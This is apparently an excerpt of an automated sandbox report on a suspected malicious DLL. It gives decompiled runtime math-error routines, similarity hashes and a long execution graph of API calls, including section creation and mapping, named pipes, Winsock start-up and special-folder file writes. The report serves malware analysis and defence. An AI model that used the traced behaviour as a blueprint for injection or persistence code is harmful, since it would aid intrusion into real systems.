                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_error
                • String ID: !$cos
                • API String ID: 1757819995-1949035351
                • Opcode ID: b51537b2761bdc66e35e25f8c78d2b381d488c5843d727cbe6cb5f4fbf7b3257
                • Instruction ID: 6ccaaf37afb0d8076bee4401a86273a5ef969ac342ab9ffefb74f8d11d3310ef
                • Opcode Fuzzy Hash: b51537b2761bdc66e35e25f8c78d2b381d488c5843d727cbe6cb5f4fbf7b3257
                • Instruction Fuzzy Hash: 9401E1BAA28FC546DA04CF22980036E6162FBDA784F949334EA5D17BC8EB2CD141CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E00007FFA7FFA535F20F8(long long _a8) {
                				intOrPtr _v24;
                				intOrPtr _v48;
                				intOrPtr _v56;
                				void* _t9;
                				void* _t10;
                				void* _t11;
                				void* _t13;
                				signed long long _t17;
                
                				r8d = 0x12;
                				goto 0x535f2120;
                				asm("int3");
                				asm("int3");
                				r8d = 0x1e;
                				goto 0x535f2120;
                				asm("int3");
                				asm("int3");
                				asm("movsd [esp+0x60], xmm0");
                				_t17 = _a8;
                				r10d = r8d;
                				asm("movaps xmm1, xmm0");
                				if ((_t17 & 0x00000000) != 0) goto 0x535f21b7;
                				if ((0xffffffff & _t17) != 0) goto 0x535f21a5;
                				r9d = 1;
                				_v24 = r9d;
                				asm("xorps xmm0, xmm0");
                				asm("movsd [esp+0x38], xmm0");
                				asm("movsd [esp+0x30], xmm1");
                				_v48 = 0x21;
                				_v56 = 8;
                				_a8 = 0;
                				_t10 = E00007FFA7FFA535F0B44(_t9, _t11, _t13, 0xffffffff & _t17, 0x53671f04, 0, 0);
                				goto 0x535f21b7;
                				_a8 = 0xfff8000000000000;
                				asm("movsd xmm0, [esp+0x60]");
                				return _t10;
                			}












                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_handle_error_raise_exc
                • String ID: !$cos
                • API String ID: 3384550415-1949035351
                • Opcode ID: edee88c7394a9a8d8abb3cd62ee3fdd2bcd9f50bfb018f013d89ef7671a95121
                • Instruction ID: b98486cbb7c7ad8c95903bcf641d360f1fde733240f316f09a453ba1c0808dd3
                • Opcode Fuzzy Hash: edee88c7394a9a8d8abb3cd62ee3fdd2bcd9f50bfb018f013d89ef7671a95121
                • Instruction Fuzzy Hash: C501D2B6A28FC446DA10CF22A80037A6162FBDA7C4F509334EA4D17B88EF3CE151CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 56%
                			E00007FFA7FFA535F210C(long long _a8) {
                				intOrPtr _v24;
                				intOrPtr _v48;
                				intOrPtr _v56;
                				void* _t9;
                				void* _t10;
                				void* _t11;
                				void* _t13;
                				signed long long _t17;
                
                				r8d = 0x1e;
                				goto 0x535f2120;
                				asm("int3");
                				asm("int3");
                				asm("movsd [esp+0x60], xmm0");
                				_t17 = _a8;
                				r10d = r8d;
                				asm("movaps xmm1, xmm0");
                				if ((_t17 & 0x00000000) != 0) goto 0x535f21b7;
                				if ((0xffffffff & _t17) != 0) goto 0x535f21a5;
                				r9d = 1;
                				_v24 = r9d;
                				asm("xorps xmm0, xmm0");
                				asm("movsd [esp+0x38], xmm0");
                				asm("movsd [esp+0x30], xmm1");
                				_v48 = 0x21;
                				_v56 = 8;
                				_a8 = 0;
                				_t10 = E00007FFA7FFA535F0B44(_t9, _t11, _t13, 0xffffffff & _t17, 0x53671f04, 0, 0);
                				goto 0x535f21b7;
                				_a8 = 0xfff8000000000000;
                				asm("movsd xmm0, [esp+0x60]");
                				return _t10;
                			}












                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_handle_error_raise_exc
                • String ID: !$sin
                • API String ID: 3384550415-1565623160
                • Opcode ID: 361b00e162a6c88b8351d59fb4018f7250c35803a1d3775a8525240e4db19aae
                • Instruction ID: 9f0fe626548f1c3974b523ed01bc2dc534fb9964156baa372bca17854b060a4e
                • Opcode Fuzzy Hash: 361b00e162a6c88b8351d59fb4018f7250c35803a1d3775a8525240e4db19aae
                • Instruction Fuzzy Hash: 0D01F5B6A28FC445D610CF12980037A6162BFDB7C4F509324EA4D16B88EF7CD141CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 51%
                			E00007FFA7FFA535F3550(void* __eax, void* __eflags, void* __r8, signed int _a32) {
                				intOrPtr _v40;
                				intOrPtr _v64;
                				intOrPtr _v72;
                				void* _t12;
                				void* _t13;
                				void* _t15;
                				void* _t19;
                				void* _t21;
                				void* _t22;
                				void* _t23;
                
                				_t23 = __r8;
                				_t19 = _t22;
                				asm("movaps [eax-0x18], xmm6");
                				asm("movaps xmm6, xmm1");
                				asm("movaps xmm2, xmm0");
                				r8d = r8d - 2;
                				if (__eflags == 0) goto 0x535f3592;
                				if (r8d != 1) goto 0x535f35ea;
                				 *((intOrPtr*)(_t19 - 0x28)) = r8d;
                				_t2 = _t23 + 2; // 0x200000001
                				r9d = _t2;
                				asm("xorps xmm1, xmm1");
                				asm("movss [eax-0x30], xmm1");
                				asm("movss [eax-0x38], xmm2");
                				 *((intOrPtr*)(_t19 - 0x40)) = 0x22;
                				 *((intOrPtr*)(_t19 - 0x48)) = 0x11;
                				goto 0x535f35bf;
                				_v40 = 1;
                				asm("xorps xmm0, xmm0");
                				asm("movss [esp+0x38], xmm0");
                				r9d = 4;
                				asm("movss [esp+0x30], xmm2");
                				_v64 = 0x22;
                				_v72 = 0x12;
                				_t8 =  &_a32;
                				_a32 = _a32 & 0x00000000;
                				asm("movss [esp+0x88], xmm6");
                				_t12 = E00007FFA7FFA535F0C6C(__eax, _t13, _t15,  *_t8, 0x53678540, _t21, _a32);
                				asm("movaps xmm0, xmm6");
                				asm("movaps xmm6, [esp+0x50]");
                				return _t12;
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_errorf
                • String ID: "$expf
                • API String ID: 2315412904-303238936
                • Opcode ID: ecdfa100b0e40134a013d6faf908fb403a36dbfd93a5c1f1fd6f413ea569dd35
                • Instruction ID: 3ca24db9f424951db9495ff09cb59ca0f26dd413ffadfcd395ce1a0a0d2c5c56
                • Opcode Fuzzy Hash: ecdfa100b0e40134a013d6faf908fb403a36dbfd93a5c1f1fd6f413ea569dd35
                • Instruction Fuzzy Hash: FD017372938BC486E331CB21D0893AAB761FBE6344F649315E348266A0CF7DD495DB00
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:3.4%
                Dynamic/Decrypted Code Coverage:0.1%
                Signature Coverage:19%
                Total number of Nodes:1204
                Total number of Limit Nodes:52
63448->63412 63450 7ffa535f7ad3 63449->63450 63457 7ffa535f8158 63449->63457 63480 7ffa535f8c00 63450->63480 63451 7ffa535f6a59 63460 7ffa535f9c34 63451->63460 63453 7ffa535f841a ConnectNamedPipe 63453->63451 63454 7ffa535f81a3 InitializeCriticalSection 63455 7ffa535f6e94 4 API calls 63454->63455 63455->63457 63457->63451 63457->63453 63457->63454 63458 7ffa535f8416 63457->63458 63458->63453 63461 7ffa535fa66f 63460->63461 63463 7ffa535f9cfe 63460->63463 63462 7ffa535fa686 GetLastError FindFirstFileA ConnectNamedPipe CreateFileA 63461->63462 63479 7ffa535fa48b 63461->63479 63462->63479 63464 7ffa535e229c 2 API calls 63463->63464 63463->63479 63465 7ffa535fa019 63464->63465 63466 7ffa535e229c 2 API calls 63465->63466 63467 7ffa535fa1ba 63466->63467 63468 7ffa535e229c 2 API calls 63467->63468 63469 7ffa535fa216 63468->63469 63470 7ffa535e229c 2 API calls 63469->63470 63471 7ffa535fa248 63470->63471 63472 7ffa535e229c 2 API calls 63471->63472 63473 7ffa535fa2b0 63472->63473 63474 7ffa535e229c 2 API calls 63473->63474 63475 7ffa535fa356 63474->63475 63476 7ffa535fa60b ExitProcess 63475->63476 63477 7ffa535fa3be 63475->63477 63488 7ffa535e27d4 ExitProcess 63477->63488 63479->63428 63481 7ffa535f8c8a 63480->63481 63483 7ffa535f7b30 63480->63483 63482 7ffa535f8d28 FindNextFileA InitializeCriticalSection 63481->63482 63481->63483 63482->63483 63484 7ffa535e229c 63483->63484 63485 7ffa535e22da GetProcessHeap 63484->63485 63487 7ffa535e22d3 __scrt_fastfail 63484->63487 63486 7ffa535e22f7 RtlAllocateHeap 63485->63486 63485->63487 63486->63487 63487->63451 63488->63479 63489->63438 63493 7ffa535e3b00 63490->63493 63494 7ffa535e1073 VirtualProtect 63493->63494 63494->63441 63495 2152060ada0 63496 2152060adc6 GetModuleHandleW 63495->63496 63497 2152060ae10 abort 63495->63497 63496->63497 63501 2152060add3 63496->63501 63498 2152060aebf abort 63497->63498 63509 2152060ae94 63497->63509 63510 2152060ba98 63497->63510 63499 2152060aee8 63498->63499 63500 2152060aef1 63498->63500 
63519 2152060af0c 7 API calls 63499->63519 63501->63497 63513 2152060af58 GetModuleHandleExW try_get_function __vcrt_uninitialize_winapi_thunks 63501->63513 63502 2152060aeac 63507 2152060bcec 28 API calls 63502->63507 63507->63498 63509->63502 63514 2152060bcec 63509->63514 63511 2152060b70c 12 API calls 63510->63511 63512 2152060bacd 63511->63512 63512->63509 63513->63497 63515 2152060bd47 63514->63515 63516 2152060bd28 63514->63516 63515->63502 63516->63515 63520 21520585910 63516->63520 63525 2152058607c 63516->63525 63521 215205f51cc __scrt_initialize_thread_safe_statics 13 API calls 63520->63521 63522 21520585923 63521->63522 63523 21520585937 WSAStartup 63522->63523 63524 2152058594b 63522->63524 63523->63524 63524->63516 63528 215205d12f4 63525->63528 63527 2152058608c 63531 215205d10d8 63528->63531 63530 215205d133b __std_exception_destroy 63530->63527 63532 215205d113a _CxxThrowException 63531->63532 63533 215205d1196 63532->63533 63534 215205d11b5 63532->63534 63543 215205d0a5c 25 API calls 3 library calls 63533->63543 63538 215205d09d0 63534->63538 63537 215205d11b0 63537->63530 63544 215205d15b8 63538->63544 63541 215205d0a2b _Ptr_base 63541->63537 63543->63537 63545 215205d15e8 63544->63545 63546 215205d0a08 63545->63546 63553 215205fb034 23 API calls 2 library calls 63545->63553 63546->63541 63549 215205d0950 63546->63549 63550 215205d09a1 __ExceptionPtr::__ExceptionPtr 63549->63550 63551 215205d09be 63550->63551 63554 215205d0af8 63550->63554 63551->63541 63555 215205d0b45 __ExceptionPtr::__ExceptionPtr 63554->63555 63558 215205d0be4 EncodePointer 63555->63558 63564 215205d0c1e __ExceptionPtr::_CallCopyCtor 63555->63564 63566 215205d0c73 63555->63566 63560 215205d0c11 63558->63560 63563 215205d0c0a std::bad_alloc::bad_alloc 63558->63563 63562 215205d15b8 _StaticAlloc 23 API calls 63560->63562 63562->63563 63563->63564 63567 215205f9940 RaiseException _CxxThrowException 63563->63567 63564->63551 63568 215205fb034 23 API calls 2 library calls 
63566->63568 63567->63566 63569 7ffa535e30c0 63570 7ffa535e30e6 63569->63570 63571 7ffa535e30fd dllmain_raw 63570->63571 63573 7ffa535e30ee 63570->63573 63575 7ffa535e311d 63570->63575 63572 7ffa535e3110 63571->63572 63571->63573 63582 7ffa535e2ec0 63572->63582 63575->63573 63576 7ffa535e316a 63575->63576 63579 7ffa535e2ec0 62 API calls 63575->63579 63576->63573 63577 7ffa535e2ec0 62 API calls 63576->63577 63578 7ffa535e3180 63577->63578 63578->63573 63580 7ffa535e318a dllmain_raw 63578->63580 63581 7ffa535e315d dllmain_raw 63579->63581 63580->63573 63581->63576 63583 7ffa535e2ec8 63582->63583 63588 7ffa535e2f01 __scrt_acquire_startup_lock 63582->63588 63584 7ffa535e2ef5 63583->63584 63585 7ffa535e2ecd 63583->63585 63614 7ffa535e33bc 63584->63614 63586 7ffa535e2ee8 __scrt_dllmain_crt_thread_attach 63585->63586 63587 7ffa535e2ed2 63585->63587 63591 7ffa535e2ee6 63586->63591 63590 7ffa535e2ed7 63587->63590 63629 7ffa535e32fc 22 API calls 63587->63629 63593 7ffa535e3085 63588->63593 63605 7ffa535e305a 63588->63605 63631 7ffa535e372c 6 API calls __scrt_fastfail 63588->63631 63590->63575 63591->63575 63632 7ffa535e3378 15 API calls __scrt_initialize_onexit_tables 63593->63632 63596 7ffa535e308a 63633 7ffa535e33a8 12 API calls __vcrt_uninitialize_ptd 63596->63633 63597 7ffa535e2f32 __scrt_acquire_startup_lock 63599 7ffa535e2f5e 63597->63599 63611 7ffa535e2f36 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 63597->63611 63630 7ffa535e372c 6 API calls __scrt_fastfail 63597->63630 63622 7ffa535e32bc 63599->63622 63600 7ffa535e3095 __scrt_release_startup_lock 63634 7ffa535e3594 8 API calls 2 library calls 63600->63634 63603 7ffa535e2f6d _RTC_Initialize 63603->63611 63625 7ffa535e3610 63603->63625 63605->63575 63609 7ffa535e2f87 63610 7ffa535e3610 35 API calls 63609->63610 63612 7ffa535e2f93 __scrt_initialize_default_local_stdio_options 63610->63612 63611->63575 63612->63611 63613 7ffa535e2faf __scrt_dllmain_after_initialize_c 63612->63613 63613->63611 
63615 7ffa535e33de __isa_available_init 63614->63615 63635 7ffa535e42ec 63615->63635 63620 7ffa535e33e7 63620->63597 63684 7ffa535e3408 63622->63684 63624 7ffa535e32c7 63624->63603 63690 7ffa535e35c0 63625->63690 63627 7ffa535e2f82 63628 7ffa535e36d4 InitializeSListHead 63627->63628 63629->63591 63630->63599 63631->63593 63632->63596 63633->63600 63634->63605 63636 7ffa535e42f5 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 63635->63636 63648 7ffa535e45b4 63636->63648 63640 7ffa535e430c 63642 7ffa535e33e3 63640->63642 63655 7ffa535e45fc DeleteCriticalSection 63640->63655 63642->63620 63643 7ffa535e7dd4 63642->63643 63644 7ffa535ef3fc 63643->63644 63645 7ffa535e33f0 63644->63645 63672 7ffa535e8588 63644->63672 63645->63620 63647 7ffa535e4348 8 API calls 3 library calls 63645->63647 63647->63620 63649 7ffa535e45bc 63648->63649 63651 7ffa535e45ed 63649->63651 63652 7ffa535e42ff 63649->63652 63656 7ffa535e4960 63649->63656 63661 7ffa535e45fc DeleteCriticalSection 63651->63661 63652->63642 63654 7ffa535e4550 8 API calls 3 library calls 63652->63654 63654->63640 63655->63642 63662 7ffa535e4634 63656->63662 63659 7ffa535e49b7 InitializeCriticalSectionAndSpinCount 63660 7ffa535e49a3 63659->63660 63660->63649 63661->63652 63663 7ffa535e469a 63662->63663 63668 7ffa535e4695 63662->63668 63663->63659 63663->63660 63664 7ffa535e4762 63664->63663 63666 7ffa535e4771 GetProcAddress 63664->63666 63665 7ffa535e46cd LoadLibraryExW 63667 7ffa535e46f3 GetLastError 63665->63667 63665->63668 63666->63663 63669 7ffa535e4789 63666->63669 63667->63668 63670 7ffa535e46fe LoadLibraryExW 63667->63670 63668->63663 63668->63664 63668->63665 63671 7ffa535e4740 FreeLibrary 63668->63671 63669->63663 63670->63668 63671->63668 63683 7ffa535ed6a8 EnterCriticalSection 63672->63683 63674 7ffa535e8598 63675 7ffa535efe8c 33 API calls 63674->63675 63676 7ffa535e85a1 63675->63676 63677 7ffa535e85af 63676->63677 63678 7ffa535e83a0 35 API calls 63676->63678 63679 7ffa535ed6fc 
_isindst LeaveCriticalSection 63677->63679 63680 7ffa535e85aa 63678->63680 63681 7ffa535e85bb 63679->63681 63682 7ffa535e848c GetStdHandle GetFileType 63680->63682 63681->63644 63682->63677 63685 7ffa535e34c6 63684->63685 63688 7ffa535e3420 __scrt_initialize_onexit_tables 63684->63688 63689 7ffa535e372c 6 API calls __scrt_fastfail 63685->63689 63687 7ffa535e34d0 63688->63624 63689->63687 63691 7ffa535e35ef 63690->63691 63693 7ffa535e35e5 _onexit 63690->63693 63694 7ffa535e7c54 35 API calls _onexit 63691->63694 63693->63627 63694->63693 63695 7ffa535fb25c 63696 7ffa535fb2b3 GetCurrentThreadId 63695->63696 63697 7ffa535fb2c3 63695->63697 63696->63697 63698 7ffa535e1000 2 API calls 63697->63698 63699 7ffa535fb32f NtOpenFile 63698->63699 63700 7ffa535fb365 63699->63700 63701 7ffa535fb359 63699->63701 63702 7ffa535e1000 2 API calls 63700->63702 63702->63701 63703 215205f4e44 63704 215205f4e4d __scrt_initialize_onexit_tables 63703->63704 63706 215205f4e51 63704->63706 63707 2152060b210 63704->63707 63708 2152060b22e 63707->63708 63709 2152060b244 63707->63709 63735 21520603944 11 API calls _Wcrtomb 63708->63735 63737 21520610b00 63709->63737 63712 2152060b233 63736 215205faabc 11 API calls _invalid_parameter_noinfo 63712->63736 63715 2152060b276 63741 2152060aff0 23 API calls _Getcvt 63715->63741 63716 2152060b23f 63716->63706 63718 2152060b2a0 63742 2152060b1ac 11 API calls 2 library calls 63718->63742 63720 2152060b2b6 63721 2152060b2be 63720->63721 63722 2152060b2cf 63720->63722 63743 21520603944 11 API calls _Wcrtomb 63721->63743 63744 2152060aff0 23 API calls _Getcvt 63722->63744 63726 2152060b2eb 63727 2152060b31b 63726->63727 63728 2152060b334 63726->63728 63732 2152060b2c3 63726->63732 63745 2152060a780 11 API calls 2 library calls 63727->63745 63747 2152060a780 11 API calls 2 library calls 63728->63747 63731 2152060b324 63746 2152060a780 11 API calls 2 library calls 63731->63746 63748 2152060a780 11 API calls 2 library calls 63732->63748 63734 2152060b330 
63734->63716 63735->63712 63736->63716 63738 21520610b0d 63737->63738 63739 2152060b249 GetModuleFileNameA 63737->63739 63749 21520610948 36 API calls 4 library calls 63738->63749 63739->63715 63741->63718 63742->63720 63743->63732 63744->63726 63745->63731 63746->63734 63747->63732 63748->63716 63749->63739 63750 7ffa535e1cf8 63751 7ffa535e1000 2 API calls 63750->63751 63752 7ffa535e1d6f 63751->63752 63753 7ffa535e1d87 GetCurrentThreadId 63752->63753 63754 7ffa535e2162 63752->63754 63753->63754 63755 7ffa535e1d9e 63753->63755 63757 7ffa535e1000 2 API calls 63754->63757 63767 7ffa535f5694 63755->63767 63759 7ffa535e214d 63757->63759 63758 7ffa535e1e53 63758->63759 63760 7ffa535e1fcf 63758->63760 63761 7ffa535e1e7e 63758->63761 63760->63759 63775 7ffa535f615c 63760->63775 63761->63759 63762 7ffa535e1ef9 63761->63762 63774 7ffa535f59e8 5 API calls __scrt_fastfail 63762->63774 63764 7ffa535e1fb9 63764->63759 63768 7ffa535f5727 63767->63768 63769 7ffa535f58d1 63767->63769 63771 7ffa535f615c 4 API calls 63768->63771 63770 7ffa535f615c 4 API calls 63769->63770 63773 7ffa535f583a 63770->63773 63772 7ffa535f578a NtMapViewOfSection 63771->63772 63772->63773 63773->63758 63774->63764 63776 7ffa535f6220 63775->63776 63782 7ffa535e206b WaitNamedPipeA 63775->63782 63777 7ffa535f6323 63776->63777 63778 7ffa535f622f NtCreateSection 63776->63778 63779 7ffa535f6347 DisconnectNamedPipe 63777->63779 63780 7ffa535f637b 63777->63780 63777->63782 63778->63782 63779->63780 63781 7ffa535f639e 63780->63781 63780->63782 63785 7ffa535f9404 FindFirstFileA CreateNamedPipeA 63781->63785 63782->63759 63782->63760 63784 7ffa535f64c0 63784->63782 63785->63784 63786 2152060b388 63787 2152060b3a5 63786->63787 63788 2152060b39c 63786->63788 63788->63787 63792 2152060b3d0 63788->63792 63793 2152060b3ae 63792->63793 63794 2152060b3e9 63792->63794 63793->63787 63804 2152060b57c 13 API calls 2 library calls 63793->63804 63795 21520610b00 36 API calls 63794->63795 63796 2152060b3ee 63795->63796 63805 
21520614924 GetEnvironmentStringsW 63796->63805 63799 2152060b3fb 63819 2152060a780 11 API calls 2 library calls 63799->63819 63801 2152060b408 63818 2152060a780 11 API calls 2 library calls 63801->63818 63804->63787 63806 215206149f6 63805->63806 63807 21520614952 WideCharToMultiByte 63805->63807 63810 2152060b3f3 63806->63810 63811 21520614a00 FreeEnvironmentStringsW 63806->63811 63807->63806 63809 215206149ac 63807->63809 63820 21520603d7c 63809->63820 63810->63799 63817 2152060b43c 11 API calls 3 library calls 63810->63817 63811->63810 63814 215206149bc WideCharToMultiByte 63815 215206149e3 63814->63815 63826 2152060a780 11 API calls 2 library calls 63815->63826 63817->63801 63818->63799 63819->63793 63821 21520603dc7 63820->63821 63822 21520603d8b __crtLCMapStringA new 63820->63822 63827 21520603944 11 API calls _Wcrtomb 63821->63827 63822->63821 63824 21520603dae HeapAlloc 63822->63824 63824->63822 63825 21520603dc5 63824->63825 63825->63814 63825->63815 63826->63806 63827->63825 63828 21520589e00 63829 21520589e6d 63828->63829 63830 21520589e64 WaitForSingleObject 63828->63830 63831 21520589e91 63829->63831 63984 21520586c40 63829->63984 63830->63829 64000 215205ccd00 63831->64000 63834 21520589e96 63835 21520589e9e 63834->63835 63836 2152058c0ab collate 63834->63836 64079 215205fae64 11 API calls 63835->64079 63838 21520589ea5 64080 215205fab80 23 API calls _Getcvt 63838->64080 63840 21520589ead 64081 215205face4 15 API calls 4 library calls 63840->64081 63842 21520589ed1 64082 21520586b10 12 API calls 3 library calls 63842->64082 63845 2152058a0b9 64084 21520586b10 12 API calls 3 library calls 63845->64084 63847 2152058a0fc 64085 21520586b10 12 API calls 3 library calls 63847->64085 63849 2152058a146 64086 215205871e0 70 API calls 2 library calls 63849->64086 63851 21520589f24 64083 21520586b10 12 API calls 3 library calls 63851->64083 63852 2152058a34c CoInitializeEx CoInitializeSecurity 64087 215205ca49c GetModuleHandleW try_get_function 63852->64087 
63854 2152058a3b2 64088 215205cbe80 31 API calls _Mpunct 63854->64088 63856 2152058a3be 64089 215205cbb80 31 API calls _Mpunct 63856->64089 63858 2152058a3c8 64090 215205895d0 12 API calls collate 63858->64090 63860 2152058a3df 64091 21520581460 35 API calls 2 library calls 63860->64091 63862 2152058a4de 64092 215205c7480 22 API calls std::_Winerror_message 63862->64092 63864 2152058a4eb 63865 2152058a4ef CoUninitialize TerminateThread 63864->63865 63866 2152058a509 63864->63866 63983 2152058bfdf collate 63865->63983 64093 2152058c4c0 12 API calls messages 63866->64093 63867 2152058a15c 63867->63852 63869 2152058a529 64094 2152058c4c0 12 API calls messages 63869->64094 63871 2152058a54b 64095 215205cc000 31 API calls _Mpunct 63871->64095 63873 2152058a558 63874 2152058a5af collate 63873->63874 64096 21520588c10 12 API calls 3 library calls 63873->64096 64099 215205cbd00 31 API calls _Mpunct 63874->64099 63877 2152058a5c8 63880 2152058a61a collate 63877->63880 64100 21520588c10 12 API calls 3 library calls 63877->64100 63878 2152058a57e 64097 215205893d0 12 API calls 63878->64097 63883 21520586c40 messages 12 API calls 63880->63883 63981 2152058a668 collate _Strcoll __ExceptionPtr::__ExceptionPtr numpunct 63883->63981 63884 2152058a598 64098 21520588d60 12 API calls 3 library calls 63884->64098 63885 2152058a5e9 64101 215205893d0 12 API calls 63885->64101 63888 2152058c061 collate 63888->63836 63889 2152058a603 64102 21520588d60 12 API calls 3 library calls 63889->64102 63893 2152058b906 Sleep 63893->63981 63897 2152058a7a0 Sleep 63897->63981 63901 2152058a998 Sleep 63901->63981 63903 2152058b7f5 Sleep 63903->63981 63905 2152058b0f5 Sleep 63905->63981 63908 2152058b289 SHGetSpecialFolderPathA lstrcatA 64113 215205c7750 53 API calls 63908->64113 63911 2152058b43f SHGetSpecialFolderPathA lstrcatA 64118 215205ca9c8 CreateFileA WriteFile CloseHandle 63911->64118 63914 2152058b36a SHGetSpecialFolderPathA lstrcatA 64116 215205c7750 53 API calls 63914->64116 63915 
2152058b932 64128 2152058c310 12 API calls 63915->64128 63916 21520586b10 12 API calls _Mpunct 63916->63981 63919 2152058b9f1 64129 215205c3d60 12 API calls 4 library calls 63919->64129 63923 2152058ba1e 64130 2152059a7f0 98 API calls 6 library calls 63923->64130 63924 2152058bb86 63925 2152058bb91 63924->63925 63926 2152058bbb9 63924->63926 64137 21520587ed0 109 API calls 5 library calls 63925->64137 63928 21520586c40 messages 12 API calls 63926->63928 63932 2152058bbb7 63928->63932 63930 2152058c510 12 API calls 63930->63981 63931 2152058d0c0 12 API calls 63931->63981 64138 21520586b10 12 API calls 3 library calls 63932->64138 63933 2152058ba56 collate 64131 21520587760 12 API calls messages 63933->64131 63935 2152058bc01 GetCurrentProcessId 64139 21520589d20 12 API calls 63935->64139 63939 2152058ba75 64132 215205868f0 12 API calls _Mpunct 63939->64132 63940 2152058bc16 64140 2152058ca20 12 API calls collate 63940->64140 63943 2152058ba89 GetCurrentProcessId 64133 21520589d20 12 API calls 63943->64133 63944 2152058bc23 64141 21520588d60 12 API calls 3 library calls 63944->64141 63948 2152058ba9e 64134 2152058ca20 12 API calls collate 63948->64134 63951 2152058bd28 64143 21520588d60 12 API calls 3 library calls 63951->64143 63954 2152058bc37 64142 21520588c10 12 API calls 3 library calls 63954->64142 63955 2152058bd3f 64144 21520588c10 12 API calls 3 library calls 63955->64144 63957 2152058bd55 64145 21520588c10 12 API calls 3 library calls 63957->64145 63959 2152058bd7e 64146 2152058c310 12 API calls 63959->64146 63961 2152058bdaa 64147 215205c3d60 12 API calls 4 library calls 63961->64147 63963 2152058bdd4 64148 2152059a7f0 98 API calls 6 library calls 63963->64148 63965 2152058baae collate 64135 215205cb510 45 API calls 6 library calls 63965->64135 63966 215205868f0 12 API calls 63966->63981 63970 2152058bb38 CoUninitialize TerminateThread 63973 2152058bb5a collate 63970->63973 63971 2152058be71 CoUninitialize TerminateThread 63976 2152058be91 63971->63976 
63972 2152058be05 64149 215205cb510 45 API calls 6 library calls 63972->64149 64136 2152058c3d0 RaiseException 63973->64136 63978 2152058bb81 collate 63976->63978 64150 2152058c690 RaiseException Concurrency::cancel_current_task new 63976->64150 64151 2152058c3d0 RaiseException 63978->64151 63981->63888 63981->63911 63981->63915 63981->63916 63981->63924 63981->63930 63981->63931 63981->63966 63982 21520586730 12 API calls 63981->63982 64103 2152059a380 98 API calls 3 library calls 63981->64103 64104 215205c3d60 12 API calls 4 library calls 63981->64104 64105 2152059a7f0 98 API calls 6 library calls 63981->64105 64106 215205fab54 23 API calls _Getcvt 63981->64106 64107 215205f4dcc RaiseException Concurrency::cancel_current_task new 63981->64107 64108 2152058cf30 RaiseException __CxxCallCatchBlock numpunct 63981->64108 64109 215205fab54 23 API calls _Getcvt 63981->64109 64110 215205fab54 23 API calls _Getcvt 63981->64110 64111 21520586430 28 API calls 63981->64111 64112 215205fab54 23 API calls _Getcvt 63981->64112 64114 21520587ae0 10 API calls 2 library calls 63981->64114 64115 215205fab54 23 API calls _Getcvt 63981->64115 64117 21520587cb0 25 API calls 2 library calls 63981->64117 64119 215205cb510 45 API calls 6 library calls 63981->64119 64120 21520587ed0 109 API calls 5 library calls 63981->64120 64121 215205c80c0 12 API calls 63981->64121 64122 215205c802c 70 API calls 63981->64122 64123 215205ba9e0 160 API calls 3 library calls 63981->64123 64124 215205893d0 12 API calls 63981->64124 64125 21520586200 12 API calls 63981->64125 64126 215205fab54 23 API calls _Getcvt 63981->64126 64127 215205fab54 23 API calls _Getcvt 63981->64127 63982->63981 64152 215205876d0 RaiseException collate 63983->64152 63985 21520586c6e 63984->63985 63986 21520586d47 63984->63986 63988 21520586c7d 63985->63988 63989 21520586cac 63985->63989 64155 215205d0924 12 API calls 2 library calls 63986->64155 63992 21520586d53 63988->63992 63993 21520586c8b 